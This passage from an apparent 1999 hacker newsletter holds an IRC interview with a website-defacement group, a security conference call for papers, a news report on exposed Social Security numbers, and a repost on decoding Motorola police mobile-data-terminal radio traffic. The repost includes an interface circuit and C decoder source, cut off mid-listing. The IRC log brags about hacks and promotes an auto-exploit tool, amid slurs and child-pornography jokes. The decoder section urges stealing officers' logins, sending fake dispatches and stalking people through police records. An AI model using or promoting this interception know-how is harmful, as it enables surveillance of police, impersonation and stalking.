escrow or from listening to the cogent arguments of civil libertarians, but merely in response to pressure from industry. From New Scientist, 6 March 1999 -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Internet Security Institute [www.isi-sec.com] @HWA 26.0 HRC's interview with Goat Security (IRC LOG) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ HRC is a new site (Hackers Resource Centre) that has premiered with the following "article" on Goat Security, the team that recently hacked Yahoo.. well a new group is out. its title: Goat Security. they are on #feed-the-goats on efnet. you may visit their page at goat.sphix.com. responsible for the Yahoo.com hack which is archived at hackernews.com this group is goin big and gettins some fame. They poke fun of Ez00ns, and B0rt. claiming they are interviewing them, and talking bout how they have anal sex among other queer things. and yes im even mentioned in the interviews. portrayed as a pedophiliac, and a homosexual. i do find this page extremely funny. it makes me laugh out loud!. the group consists of members from HcV, and Legion2000. theres a few others that dont belong to a group. the complete roster is on their homepage. for the full interview direct your attention here.(see below) on march 18th they also got des-con-systems.com as far as i know there isnt a archive of this hack. ech0 owned them again on March 21st. with mad elite props to goat security. well i wonder how long this group will go on. b0w to the goat. From HRC http://solarz.net/hrc/interviewedgoats.html Session Start: Sun Mar 21 22:09:24 1999 * Logging #goating to '#goating_990321.log' [Debris] one min [^Dreamer] k ��� [join(#goating)] chemmy (lamur@modemcable207.162.mmtl.videotron.net) ��� [mode(#goating)] Debris (+o chemmy) [chemmy] Dont you hate when you overwrite a window [Debris] lol [Debris] hold on [^Dreamer] k [Debris] Ok lets get started [^Dreamer] k [chemmy] I cant figure out MY FUCKING ERROR [Debris] chem [Debris] this is an interview [^Dreamer] 1) why was feed-the-goats founded? to annoy ppl? to inform ppl of ez00s? [^Dreamer] ez00ns rather [chemmy] Ha [chemmy] ^Dreamer, Because Debris had no life.. [Debris] Well basically me and ech0 started it in one boring day [Debris] hold on more coming [Debris] we were talking and ech0 told me how he sometimes makes a chan called #feed-the-goats [Debris] so, me and ech0 went there and asked chem if we could use one of his eggdrops and of course he said no at first [Debris] but then he changed his mind [^Dreamer] whyd you change your mind chem? [Debris] And ech0 got hcv people coming and stuff, and i thought if i turn this into a group i can be cool so here we are [chemmy] Cuz debby was my friend :> [Debris] =] [chemmy] And I mean I had lotsa so why not put one in a gay unpopular friend [chemmy] friend-chan [^Dreamer] ok so then the groups as most ppl know naturally hate/dislike/whatever ez00ns and b0rt and myself. so the group just kinda turned to pokin fun and makin fake interviews [^Dreamer] ? [Debris] me and ech0 seem to dislike everyone but ourselves and our friends [Debris] And we enjoy pissing off the world [Debris] and [Debris] well we think LoU is gay, and ez00ns is too [Debris] so why not tell everyone else [^Dreamer] understandable [chemmy] hehe [Debris] were just letting out our creative genius [^Dreamer] who drew the damn goat pics on the intro to the goat page? [Debris] um [Debris] heh [Debris] uh, we um..... found thaty [^Dreamer] i like em [Debris] actually it was me [^Dreamer] do you have plans of like world domination? cyber wars? killing anything? or just having some fun? [^Dreamer] i know this interview sucks dick, but youll have to forgive me for ive never interviewed anyone before [chemmy] What is this interview for? [Debris] Well our plans at this time are, to dominate the blowing up of toilets scene, and take out the cDc forever! [^Dreamer] so you hate the cDc (Cult of the Dead Cow???) [Debris] yes [Debris] they always ban me, all i wanted was some damn JUAREZ [^Dreamer] well i started a page called H.R.C. (solarz.net/hrc) and i plan on putting this up there as my first article.. [chemmy] ha ok [^Dreamer] was FtG responsible for the yahoo hack? [Debris] whos ftg? [chemmy] Just remember, Debris is crazy [chemmy] Ftg? [^Dreamer] Feed-the-Goats [Debris] We are goat security [^Dreamer] ok goat security (Gs ok?) [chemmy] So therefore yes [Debris] Yes, the yahoo hack, although denied by yahoo, did take place and was committed by members of Goat [^Dreamer] why did you target yahoo? any specific reason [chemmy] yahoo is gay [chemmy] I hate the name [Debris] like the altered index.htm said, We were looking for porn and found pictures of billy boy [^Dreamer] gotcha, well if ya ever want porn ive got mad pics (and no theres no child porn ) [Debris] well we only want child porn [Debris] and for the record, EHAP can suck my underaged cock [chemmy] and gr0wn grand pa's. [Debris] sorry RS... [^Dreamer] anyone else youd like to send your deepest regards too? just what groups/ppl do u like? [Debris] yes [^Dreamer] i understand that you hate dalnet, is this true and y? [^Dreamer] am gettin ahead of myself [Debris] I dont hate dalnet but i never go on it [chemmy] I am in X-Forces so therefore I LIKE ALL MY FRIEEEEEEENDS! [^Dreamer] does x-forces have a homepage? [Debris] ya, werd to #freaks, m1les, X-forces, Script kiddies inc (which im in and some texts i wrote are there) and #webfringe [chemmy] x-forces.com but it sucks [^Dreamer] alright. [chemmy] We're actually doing a new design (BTW it sucked cuz I wanna implicated it in =) ) [Debris] some stuff i wrote is at www.nuclearbomb.com/ski [chemmy] And the x-forces serv hosts goat's page [chemmy] So if debris tries anals attempts on me [chemmy] It drops [^Dreamer] haha [^Dreamer] you guys are just too crazy [Debris] shutup you stupid seperatist [chemmy] DIE CANADA DIE [chemmy] Yes [Debris] DIE FRENCH WHORE [^Dreamer] anything youd like to end in closing? [chemmy] Yes [Debris] yes [^Dreamer] shoot [chemmy] WE WILL OWN THE UNIVERSE@&*^#@ [Debris] my turn [chemmy] I plan on dominating the world [Debris] IL MAY BE GOING TO JAIL TOMORROW SO...... FREE I-L, FREE GOAT! [^Dreamer] goin to jail for? [Debris] assault [^Dreamer] o one more thing [Debris] what [^Dreamer] what was the url of that site that goat security owned tongiht? [Debris] that wasnt goat [Debris] that was opt1k [chemmy] des-con-systems.com [chemmy] Ya [Debris] opt1k aint no goat [^Dreamer] yes. what was that site origianlly? [Debris] goat owned that site first [Debris] 3 days ago [^Dreamer] and y did ya target it? [chemmy] Ask opt1k [Debris] because it was easy, and our premade scripts supported irt [chemmy] And note that tomorrow or day after me & ech0 release a nice prog [^Dreamer] where can we get the prog? [Debris] no its not [Debris] itsa gay prog, your making so ken will hump you [chemmy] We'll release it to friends first then public if any site wants it :> [chemmy] No deb you jealous you fuck! [chemmy] I'm gonna haxor you with it [chemmy] CUZ EYE AM A SCRIPT KIDDIE [^Dreamer] you can put it no solarz.net/hrc [chemmy] Okay [chemmy] We will [Debris] it will be released on goat first [^Dreamer] alright then [Debris] goat.sphix.com [chemmy] Shut up deb you aint c0ding it [chemmy] =) [chemmy] Dreamer how old are you? [^Dreamer] what will this prog do? [Debris] im gunna code something better thab it [chemmy] Debris, lol [Debris] itll will auto phf [^Dreamer] what os'es suppoort it [^Dreamer] im 18 [Debris] goat0s [chemmy] It will detect and report ONLY exploitable services..not only the open one [chemmy] And auto remote exploit it [chemmy] Tested on linux for now [^Dreamer] sounds good for lazy ppl [Debris] tested? [Debris] ahaha [Debris] it cant even connect yet [chemmy] No, sounds good for script kiddies [Debris] duh whatsa socket [chemmy] Debris, DID I SAY IT WAS FINISHED? [Debris] YES [chemmy] NO [chemmy] I SAID TOMORROW OR DAY AFTER [chemmy] YEW CUNT [Debris] shut the fuck up you worthless piece of shit [chemmy] I'm gonna slap a dick in your face you goat whore [Debris] UDP KIDDIE MUASHASHASHAAHS [^Dreamer] ok am done with you [Debris] GOOD [^Dreamer] thanks guys i appreciate it [chemmy] lol [chemmy] ok ��� [part(#goating)] Debris (~Debris@ppp-5800-02b-3102.mtl.total.net) [chemmy] Cya ��� [part(#goating)] ^Dreamer (barry@ts0800.hhs.net) Session Close: Sun Mar 21 22:33:25 1999 @HWA 27.0 Year 2000 Network and Distributed System Security ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ForwardedFrom: "Jay D. Dyson" <jdyson@techreports.jpl.nasa.gov> Courtesy of Cryptography List. Originally From: "David M. Balenson" <balenson@tislabs.com> C A L L F O R P A P E R S The Internet Society Year 2000 Network and Distributed System Security Symposium (NDSS 2000) Catamaran Resort Hotel, San Diego, California February 2-4, 2000 IMPORTANT DATES: Paper and panel submissions due: June 16, 1999 Author notification: August 17, 1999 Final versions of papers and panels due: October 15, 1999 GOAL: This symposium aims to foster information exchange among researchers and practitioners of network and distributed system security services. The intended audience includes those who are interested in practical aspects of network and distributed system security, with the focus on actual system design and implementation, rather than theory. A major goal of the symposium is to encourage and enable the Internet community to apply, deploy, and advance the state of available security technology. The proceedings of the symposium will be published by the Internet Society. Submissions are solicited for, but are not limited to, the following topics: * Secure Electronic Commerce, e.g., payment, barter, EDI, notarization/timestamping, endorsement and licensing. * Intellectual Property Protection: protocols, schemas, implementations, metering, watermarking, other forms of rights management. * Implementation, deployment and management of network security policies. * Integrating Security in Internet protocols: routing, naming, TCP/IP, multicast, network management, and, of course, the Web. * Attack-resistant protocols and services. * Special problems and case studies: e.g. interplay and tradeoffs between security and efficiency, usability, reliability and cost. * Security for collaborative applications and services: tele- and video-conferencing, groupwork, etc. * Fundamental services: authentication, data integrity, confidentiality, authorization, non-repudiation, and availability. * Supporting mechanisms and APIs: key management and certification, revocation, audit trails and accountability. * Integrating security services with system and application security facilities and protocols, e.g., message handling, file transport/access, directories, time synchronization, data base management, boot services, mobile computing. * Security for emerging technologies -- sensor networks, specialized testbeds, wireless/mobile (and ad hoc) networks, personal communication systems, and large heterogeneous distributed systems. * Intrusion Avoidance, Detection, and Response: systems, experiences and architectures * Network Perimeter Controls: firewalls, packet filters, application gateways. BEST PAPER AWARD: A best paper award will be introduced at NDSS 2000. This award will be presented at the symposium to the authors of the best paper to be selected by the program committee. GENERAL CHAIR: Stephen Welke, Trusted Computer Solutions PROGRAM CO-CHAIRS: Gene Tsudik, USC / Information Sciences Institute Avi Rubin, AT&T Labs - Research TUTORIAL CHAIR: Doug Maughan, NSA / DARPA PROGRAM COMMITTEE: Bill Cheswick, Lucent Bell Labs Marc Dacier, IBM Research Zurich Jim Ellis, CMU / CERT Carl Ellison, Intel Ed Felten, Princeton Virgil Gligor, UMD College Park Thomas Hardjono, Bay Networks/Nortel Cynthia Irvine, Naval Postgraduate School Charlie Kaufman, Iris Associates Dave Kormann, AT&T Labs - Research Hugo Krawczyk, Technion and IBM Carl Landwehr, Naval Research Lab Doug Maughan, NSA / DARPA Gary McGraw, Reliable Software Technologies Sandra Murphy, TIS Labs at Network Associates Clifford Neuman, USC / Information Sciences Institute Paul Van Oorschot, Entrust Sami Saydjari, DARPA ISO David Wagner, UC Berkeley Bennet Yee, UC San Diego LOCAL ARRANGEMENTS CHAIR: Thomas Hutton, San Diego Supercomputer Center PUBLICATIONS CHAIR: John Kochmar, SEI PUBLICITY CHAIR: David Balenson, TIS Labs at Network Associates LOGISTICS CHAIR: Carla Rosenfeld, Internet Society REGISTRATIONS CHAIR Beth Strait, Internet Society SUBMISSIONS: The committee invites both technical papers and panel proposals. Technical papers should be at most 20 pages long. Panel proposals should be at most two pages and should describe the topic, identify the panel chair, explain the format of the panel, and list three to four potential panelists. Technical papers will appear in the proceedings. A description of each panel will appear in the proceedings, and may -- at the discretion of the panel chair -- include written position statements from the panelists. Each submission must contain a separate title page with the type of submission (paper or panel), the title or topic, the names of the author(s), organizational affiliation(s), telephone and FAX numbers, postal addresses, e-mail addresses, and must specify the contact author in case of multi-author submissions. The names of authors, affiliations, and other identifying information should appear only on the separate title page. Submissions must be received by June 16, 1999, and must be made via electronic mail in either PostScript or ASCII format. If the committee is unable to print a PostScript submission, a hardcopy will be requested. Therefore, PostScript submissions must arrive well before the deadline. All submissions and program related correspondence (only) should be directed to the program chair: Gene Tsudik USC Information Sciences Institute 4676 Admiralty Way Marina Del Rey, CA 90292 Email: ndss00@isi.edu TEL: +1 (310) 822-1511 ext 329 FAX: +1 (310) 823-6714 Dates, final call for papers, advance program, and registration information will be available soon at the URL: httl//www.isoc.org/ndss2000. Each submission will be acknowledged by e-mail. If acknowledgment is not received within seven days, please contact the program chair as indicated above. Authors and panelists will be notified of acceptance by August 17, 1999. Instructions for preparing camera-ready copy for the proceedings will be sent at that time. The camera-ready copy must be received by October 15, 1999. - ---------------------------------------------------------------------- David M. Balenson, Cryptographic Technologies Group TIS Labs at Network Associates, Inc. 3060 Washington Road, Suite 100, Glenwood, MD 21738 USA balenson@tislabs.com; 443-259-2358; fax 301-854-4731 pgp fingerprints FD53 918E 097A 2579 C1A8 34F8 E05D E74F AC1D E184 (DSS/DH) D43B 565B 2C0E 90F4 38BB D9EA 1454 3264 (RSA) @HWA 28.0 Billionaires social security numbers listed on net (Yes Gates is here too) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC still listing Social Security IDs By Courtney Macavinta Staff Writer, CNET News.com March 23, 1999, 4:00 a.m. PT The Social Security numbers of many billionaire executives, including Bill Gates, are still listed on the Internet nearly two years after the Securities and Exchange Commission ceased collecting them on certain public forms. High-tech moguls have voluntarily included their Social Security numbers in filings documenting their stock ownership that were later made freely available on the SEC's Web site, as CNET News.com reported in 1997. Fearing that the Net made it too easy to exploit personal information, the SEC revised its rules in June 1997 and said it would no longer accept Social Security numbers on those forms. Nonetheless, News.com found old filings--and in some cases documents filed after the rule change--that still include the numbers of corporate officers at public companies. If the nine-digit numbers fall into the wrong hands, they can be used to obtain such information as current and previous addresses, employment histories, or credit reports--which, in turn, can unlock other private data such as bank account numbers. In addition to Microsoft's chairman Gates and cofounder Paul Allen, Intel cofounder Gordon Moore and Gateway founder Ted Waitt are among the members of the billionaire club whose Social Security numbers remain easily accessible through the SEC's EDGAR database. The Social Security numbers of Gates, Allen, and Moore were found on forms filed before the summer of 1997, but Waitt's number was accepted on a February 1998 filing, after the SEC changed its policy. Social Security numbers were created to track earnings and Social Security benefits. But the unique numbers are now used for much more, leading privacy organizations to argue that the SEC has a moral obligation to stop publishing them on the Net. "The SSN is the way that everybody's financial records are kept together," said Jodie Beebe, a spokesman for the Privacy Rights Clearinghouse. "If somebody gets a copy of your SSN, they can get utilities hooked up, rack up several credit cards, establish employment--and your credit report can be ruined," she added. "Identity theft can wreak havoc in your life." Microsoft would not comment about the exposure of Gates's Social Security number, though privacy concerns are nothing new to the company. The software giant and Intel--its chipmaking partner in the Wintel PC juggernaut--found themselves at the center of recent computer privacy concerns when it was revealed that their products could be used to track Net users' activities. In fact, anxiety over the increasing loss of privacy in the information age is at an all-time high, with many lawmakers and consumer advocates calling for industry and government to more closely guard personally identifiable information, which is solicited by Web sites, compiled by database creators or resold in digital format. The SEC is also worried about inadvertently playing a part in identity theft or other privacy breaches. "With the growth of the EDGAR database, and its availability to millions of viewers on the commission's Web site, the commission is concerned that these numbers are too readily available," the SEC stated in its June 1997 rule change. "The usefulness of Social Security numbers filers voluntarily provide on these forms is outweighed by the risk of misuse created by the disclosure of those numbers." Still, the SEC has no plans to remove documents from its online archive that include the numbers, spokesman John Heine said yesterday. "We can't alter those forms. They are a matter of public record," he said. @HWA 29.0 The Doghouse -- Motorola's MDC-4800 Police Data Terminal ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Cryptogram I'd grab this software before it becomes too well known and pulled from the site ... - Ed There's a Windows program that decodes the police car mobile data terminal transmissions. If you thought listening in on police radio frequencies was interesting, you should see what comes over on those data transcripts. Motorola's "encryption" wasn't designed for privacy, it's more like a checksum for transmission integrity. Basically, it's XOR. The software is free, although there is this helpful notice on the Web site: "Decoding MDT transmissions may be illegal in some countries, you may want to check the laws for your country before using this program." http://www.geocities.com/ResearchTriangle/Facility/7646/ From the site; How to decode the MDC 4800 Protocol Greetings one and all, Have you ever lusted to decode Mobile Data Terminal (MDT) tranmissions? Have you ever wanted to see the same NCIC and motor vehicle information that law enforcement officers see? Have you ever wanted to see what officers send to each other over "private" channels? And all this with an interface you can build with only a few dollars worth of parts from your local radio shack? If so this posting might be your rendevous with destiny. The tail end of this posting includes the source code of a program that decodes and displays MDT messages. It stores roughly 30k of messages in a buffer and then writes the whole buffer to a file called "data.dat" before terminating. The program may be interrupted at any time by pressing any key (don't use control-c) at which point it writes the partially filled buffer to "data.dat". This program only works for systems built by Motorola using the MDC4800 tranmission protocol. This accounts for a large fraction of public service MDT systems as well other private systems. The existence of this program is ample evidence that Motorola has misrepresented its MDT systems when it marketed them as a secure means of communcications. The interested reader will soon discover that these systems do not use any form of encryption. Security concerns instead have been dealt with by using a code. "And what might this code be called?" asks the reader. The code turns out to be plain ASCII. What follows is a brief description of how the program and the MDC4800 protocol work. If you don't understand something go to your local library and check out a telecommunications theory book. 1. The raw transmission rate is 4800 baud. The program's interrupt service routine simply keeps track of the time between transitions. If you're receiving a perfect signal this will be some multiple of 1/4800 seconds which would then give you how many bits were high or low. Since this is not the best of all possible worlds the program instead does the following: transitions are used to synchronize a bit clock. One only samples whenever this clock is in the middle of the bit to produce the raw data stream. This greatly reduces jitter effects. 2. Whenever a tranmitter keys up the MDC4800 protocol calls for bit synchronization (a sequence of 1010101010101010....). In the program this will result in receive bit clock synchronization. There is no need to specifically look for the bit sync. 3. Look for frame synchronization in raw bit stream so that data frames can be broken apart. Frame synchronization consists of a 40 bit sequence : 0000011100001001001010100100010001101111. If this sequence is detected (or 35 out of 40 bits match up in the program) the system is idling and the next 112 bit data block is ignored by the program. If the inverted frame sync is detected one immediately knows that 112 bit data blocks will follow. 4. Receive the 112 bit data block and undo the bit interleave. This means that one must reorder the bits in the following sequence : {0,16, 32,48,64,80,96,1,17,33,49,65,81,97,2,18,34,...} if the orignal sequence were received as {0,1,2,3,4,5,6,7,8,...}. 5. Check the convolutional error correcting code and count the number of errors. The error correcting code is rate 1/2 which means we will be left with 56 data bytes. The encoder is constructed so that the output consists of the original data bits interspersed with error correcting code. The generating polynomial used is : 1 + X^-1 + X^-5 + X^-6 Whenever an error is detected a counter is incremented. An attempt is made to correct some errors by finding the syndrome and looking for the bogus bit. 6. Keep receiving 112 bit data blocks until either a new frame sync is found or two consecutive data blocks have an unacceptably large number of errors. 7. Each data block consists of six data bytes; the last 8 bits are status bits that are simply ignored. The program shows the data in two columns - hexadecimal and ASCII. This data is kept in a buffer and is written to the file "data.dat" when the program terminates. 8. What the program doesn't do: As a further check on the data there can be CRC checks. This varies from protocol to protocol so this program does not implement the CRC checks. Nonetheless, it is a relatively trivial matter to find the generating polynomial. The addresses, block counts, and message ID numbers are also quite easy to deduce. As you can see, there is no encryption. The bit interleave and the error correcting coding are there solely to insure the integrity of the ASCII data. Since any moron could have figured this stuff out from scratch one could argue that MDTs do not use "...modulation parameters intentionally witheld from the public". Therefore the Electronic Communications Privacy Act may not prohibit receiving MDT tranmissions. However, consult your attorney to make sure. The total disregard for security will no doubt annoy countless Motorola customers who were assured that their MDT systems were secure. Since Federal law states that NCIC information must be encrypted your local law enforcement agency might be forced to spend millions of dollars to upgrade to a secure MDT system - much to the delight of Motorola and its stockholders. Cynics might conclude that the release of a program like this is timed to coincide with the market saturation of existing MDT systems. Also, this program is completely free and it had better stay that way. What's to prevent you from adapting this into a kit and selling it from classified ads in the back of Nuts and Volts? Nothing. But take a look at Motorola's patents sometime. You'll notice that this program does things that are covered by a shitload of patents. So any attempt to take financial advantage of this situtation will result in utter misery. Please keep the following in mind: this program only works with the first serial port (COM1). If your mouse or modem is there too bad. If you don't like this rewrite the program. ------------------------------------------------------------------------ What equipment do I need? RADIO SCANNER: A scanner that can receive 850-869 MHz. For those of you who don't know, this is the band where most business and public service trunked radio systems can be found along with the mobile data terminal transmissions. Chances are excellent that if your local authorities have a motorola trunked radio system and mobile data terminals that this is the frequency band in use. Very rarely will one find mobile data terminals in other frequency bands. Now for the fun part - your scanner should probably be modified to allow you to tap off directly from the discriminator output. If you wait until the signal has gone through the radio's internal audio filtering the waveform will likely be too heavily distorted to be decoded. This is exactly the same problem that our friends who like to decode pager transmissions run into - some of them have claimed they can only decode 512 baud pager messages using the earphone output of their scanner. These mobile data terminal messages are 4800 baud so I don't think you have a snowball's chance in hell without using the discriminator output. If you don't know where to begin modifying your scanner you might want to ask those who monitor pagers how to get the discriminator output for your particular radio. COMPUTER/SCANNER INTERFACE Those of you who have already built your interface for decoding pager messages should be able to use that interface without any further ado. For those starting from scratch - you might want to check out packages intended for pager decoding such as PD203 and the interfaces they describe. The following excerpt gives an example of a decoder that should work just fine (lifted out of the PD203 POCSAG pager decoder shareware documentation): > > 0.1 uF |\ +12v > ---||-----------------------|- \| > AF IN | |741 \ > ---- | | /--------------------- Data Out > | \ ------|+ /| | CTS (pin 5/8) > | / 100K | |/-12v | or DSR (pin 6/6) > | \ | | > GND / ----/\/\/\---- GND ------ GND (pin 7/5) > | | 100K > | \ N.B. Pin Numbers for com port are > GND / given as x/y, where x is for a 25 > \ 10K way, y for a 9 way. > / > | > GND > This needs a mod - It is far to deaf as this. Remove the 10k resistor and replace it with a 470 ohm preset and 560 ohm fixed in series. Audio level is critical in the pd203 that he refers to ! - dg > The above circuit is a Schmitt Trigger, having thresholds of about +/- 1v. balls - its nearer to 3 to 4 volts p-p! (dg) > If such a large threshold is not required, eg for a discriminator output, > then the level of positive feedback may be reduced by either reducing the > value of the 10K resistor or by increasing the value of the 100K feedback > resistor. > > The +/- 12v for the op-amp can be derived from unused signals on the COM > port (gives more like +/- 10v but works fine !):- > > > TxD (2/3) --------------|<-------------------------------------- -12v > | | > RTS (4/7) --------------|<-------- GND - - > | | _ + 10uF > --------->|------- - - | > Diodes 1N4148 | - + 10uF GND > | | > DTR (20/4) ------------->|-------------------------------------- +12v > If I were building this circuit I would strongly suggest tying the non-inverting (+) input of the op-amp to ground since you are working directly with the discriminator output and don't need a Schmitt trigger. All these parts or equivalents are easily available (even at your local Radio Shack which stocks the finest collection of components that have failed the manufacturer's quality control checks and supported by a sales staff that's always got the wrong answers to your questions). Also: DO NOT use the RI (ring indicator) as an input to the computer. ------------------------------------------------------------------------- How do I check things? As a first step, I would get a package such as PD203 and use it to decode a few pages. If you can get that working you know that that your interface circuit is functioning correctly. If you are in a reasonably sized town you might be part of the ardis network. The ardis network is a nationwide commercial mobile data terminal network where one can send/receive E-mail messages from one's portable computer. It has been exclusively assigned the frequency of 855.8375 MHz. Therefore, if you can hear digital bursts on this frequency you are basically guarranteed that these are MDC4800 type messages. You should be able to get stuff popping up on your screen although a lot of the messages will not be plain english. If your interface works but you can't seem to get any messages on the screen for a channel you know is a Motorola MDT system then it might be possible that your scanner/interface is putting out data with the polarity reversed. To check for this run the program with a command line arguement. When it runs you should an initial "Polarity reversed" message and hopefully then things will work out for you. Other than that: if this program doesn't work pester someone else who has got it working. Don't bother pestering the author(s) of this posting; the shit(s) aka "she/he/it (s)" are afraid of a thousand lawyers from Motorola descending like fleas to infest their pubic hair and accordingly have decided to remain forever anonymous. No doubt someone on the usenet who sees this post will know what to do with this program and also hopefully rewrite into a more user friendly form. When you do please don't forget to release the source code. ------------------------------------------------------------------------- Future projects/nightmares you might want to think about: Certain MDT systems embed formatting information in the text in the form of ESC plus [ plus a few more bytes. Someone might want to decode these on the fly and format the output so it looks exactly the same way as the user sees it. Make it so that this program works with com ports other than COM1. Make it user friendly? Enlarge the data buffer from the current 30k. Give the output data file an unique name each time the program is run instead of "data.dat". How about sorting through the past traffic so that you only see traffic to a specified user? The program does not cut data blocks off in the display but it might add an extra one or two (which will display as all zeroes). Someone might want to make all those zeroes be shown as blanks instead. Write some real instructions. Now the more ambitous stuff: Are you half-way competent with RF engineering? Then listen in to the tranmissions from the mobile units back to the base station. That way you get everyone's password and user IDs as they log on to the MDT system. By this point you will no doubt have been able to figure out all of the appropriate communications protocols so you should think about getting your own transmitter up and running along with the necessary program modifications so that you can transmit MDT messages. The required transmitter can be very simple - for example, those masocists who want to start from scratch might want to special order an appropriate crystal (pulling the frequency with the computer's tranmit signal), building a frequency multiplier chain, and adding a one watt RF amplifier to top it all off (see the appropriate ARRL publications for more information on radio techniques). Now you can log in and look at the criminal records and motor vehicle information on anybody you can think of. Find out what your neigbors are hiding. Find out who that asshole was that cut you off downtown. Find out where your former girl/boy friend is trying to hide from you. And on and on... Those with simpler tastes might want to simply transmit at the base station's frequency to any nearby MDT terminal - now you too can dispatch your local law enforcement agencies at the touch of your fingers!!! See your tax dollars at work tearing apart every seam of your neighbor's house. Or create strife and dissension in your local law enforcement agency as more and more officers come out of the closet using their MDTs trying to pick up fellow officers. There are municipalities that have put GPS receivers on all of their vehicles. Should it happen that the information is sent back over one of these networks you could have your computer give you a real-time map showing the position of every vehicle and how far away they are from you. Extend your knowledge to other data networks. Here you will want to look at the RAM mobile data network. It uses the MOBITEX protocol which is really easy to find information on. Since it is an 8 kilobaud GMSK signal there is a decent chance that you can use the interface described here. This transmission mode demmands much more from your equipment than MDT tranmissions. At the very least you must be much more careful to make sure you have adequate low frequency response. Despite this it is possible to receive and decode MOBITEX transmissions with a simple op-amp circuit! This just goes to show you what drivelling bullshit RAM's homepage is filled with - they explain in great detail how hackers will never be able to intercept user's radio tranmissions (incidentally explaining how to decode their tranmissions). The necessary program will be the proverbial exercise left for the reader. For better performance buy a dedicated MOBITEX modem chip and hook it up to your computer. ----------------------------------------------------------------------- A few words about the program: Remember - you must have your decoder hooked up to COM1. The RTS line will be positive and the DTR line negative but if you built the decoder with a bridge rectifier you really don't have to worry about their polarity. Stop the program by punching any key; don't use control-c or control-break! If you must reverse polarity run the program with any command line arguement (example: type in "mdt x" at the command line if your program is mdt.exe). You should then see the "Polarity Reversed." message pop up and hopefully things will then work. As far as compiling this - save the latter portion of this posting (the program listing) and feed it to a C compiler. Pretty much any C compiler from Borland should work. If you (Heaven Forbid) use a Microsoft C compiler you might need to rename some calls such as outport. Follow any special instructions for programs using their own interrupt service routines. This program is not object oriented. It also does not want anything whatsoever to do with Windows. Please don't even think about running this program under Windows. Finally, here it is: ---------------------- C u t H e r e ! ! ! -------------------------- /* start of program listing */ #include <stdio.h> #include <conio.h> #include <dos.h> #include <math.h> /* Purpose of program: receive messages using the Motorola MDC4800 */ /* protocol and show them on the screen */ /* */ /* WARNING TO ALL : This program is free. Please distribute and modify*/ /* this program. I only request that you always include the source */ /* code so that others may also learn and add improvements. The */ /* status of this program at the time of the original release is : */ /* it doesn't have much in the way of a user interface or options but */ /* it should work if you follow the procedure in the text file. Don't */ /* expect any sort of support (you get what you pay for - nothing in */ /* this case). Finally, here's a special message to all of you who */ /* might have the urge to try to make money with this information: */ /* I know where you live. I will shave your pets and pour rubbing */ /* alcohol all over them (unless said pet happens to be a Rottweiler).*/ /* I will have sex with your wife while you off at work; on the rare */ /* occasions when you have sex with your wife she will in the throes */ /* of passion cry not your name but mine. I will sell drugs to the */ /* demented spawn you refer to as your children. And if that's not */ /* enough for you let a thousand lawyers from motorola descend on you */ /* and pound your fat rear end so far into the ground that it finally */ /* sees daylight again somewhere in Australia. */ /* */ /* */ /* General tidbits (a few of those "Why were things done this way */ /* questions). */ /* 1. Why is captured data kept in an array and only written to a */ /* disk file at the very end? Because disk access seems unreliable */ /* when so much time is taken up by the background interrupt service */ /* routine. */ /* 2. Why is the array storing this so small? Because yours truly was */ /* too damn lazy to use a pointer and allocate a huge chunk of memory.*/ /* (Hint for those of you who would like to improve this. */ /*--------------------------------------------------------------------*/ /* global variables */ int lc=0; char fob[30000];/* output buffer for captured data to be sent to disk */ int foblen=29900; int fobp=0; /* pointer to current position in array fob */ char ob[1000]; /* output buffer for packet before being sent to screen */ int obp=0; /* pointer to current position in array ob */ static unsigned int buflen= 15000; /* length of data buffer */ static volatile unsigned int cpstn = 0; /* current position in buffer */ static unsigned int fdata[15001] ; /* frequency data array */ void interrupt (*oldfuncc) (); /* vector to old com port interrupt */ /**********************************************************************/ /* this is serial com port interrupt */ /* we assume here that it only gets called when one of the status */ /* lines on the serial port changes (that's all you have hooked up). */ /* All this handler does is read the system timer (which increments */ /* every 840 nanoseconds) and stores it in the fdata array. The MSB */ /* is set to indicate whether the status line is zero. In this way */ /* the fdata array is continuously updated with the appropriate the */ /* length and polarity of each data pulse for further processing by */ /* the main program. */ void interrupt com1int() { static unsigned int d1,d2,ltick,tick,dtick; /* the system timer is a 16 bit counter whose value counts down */ /* from 65535 to zero and repeats ad nauseum. For those who really */ /* care, every time the count reaches zero the system timer */ /* interrupt is called (remember that thing that gets called every */ /* 55 milliseconds and does housekeeping such as checking the */ /* keyboard. */ outportb (0x43, 0x00); /* latch counter until we read it */ d1 = inportb (0x40); /* get low count */ d2 = inportb (0x40); /* get high count */ /* get difference between current, last counter reading */ tick = (d2 << 8) + d1; dtick = ltick - tick; ltick = tick; if ((inportb(0x3fe) & 0xF0) > 0) dtick = dtick ^ 0x8000; else dtick = dtick & 0x3fff; fdata[cpstn] = dtick; /* put freq in fdata array */ cpstn ++; /* increment data buffer pointer */ if (cpstn>buflen) cpstn=0; /* make sure cpstn doesnt leave array */ d1 = inportb (0x03fa); /* clear IIR */ d1 = inportb (0x03fd); /* clear LSR */ d1 = inportb (0x03fe); /* clear MSR */ d1 = inportb (0x03f8); /* clear RX */ outportb (0x20, 0x20); /* this is the END OF INTERRUPT SIGNAL */ /* "... that's all folks!!!!" */ } void set8250 () /* sets up the 8250 UART */ { static unsigned int t; outportb (0x03fb, 0x00); /* set IER on 0x03f9 */ outportb (0x03f9, 0x08); /* enable MODEM STATUS INTERRUPT */ outportb (0x03fc, 0x0a); /* push up RTS, DOWN DTR */ t = inportb(0x03fd); /* clear LSR */ t = inportb(0x03f8); /* clear RX */ t = inportb(0x03fe); /* clear MSR */ t = inportb(0x03fa); /* clear IID */ t = inportb(0x03fa); /* clear IID - again to make sure */ } void set8253() /* set up the 8253 timer chip */ { /* NOTE: ctr zero, the one we are using*/ /* is incremented every 840nSec, is */ /* main system time keeper for dos */ outportb (0x43, 0x34); /* set ctr 0 to mode 2, binary */ outportb (0x40, 0x00); /* this gives us the max count */ outportb (0x40, 0x00); } /****************************************************************/ int pork(int l) { static int s=0,sl=0x0000,t1,asp=0,ll,k,v,b,tap,synd=0,nsy; static char 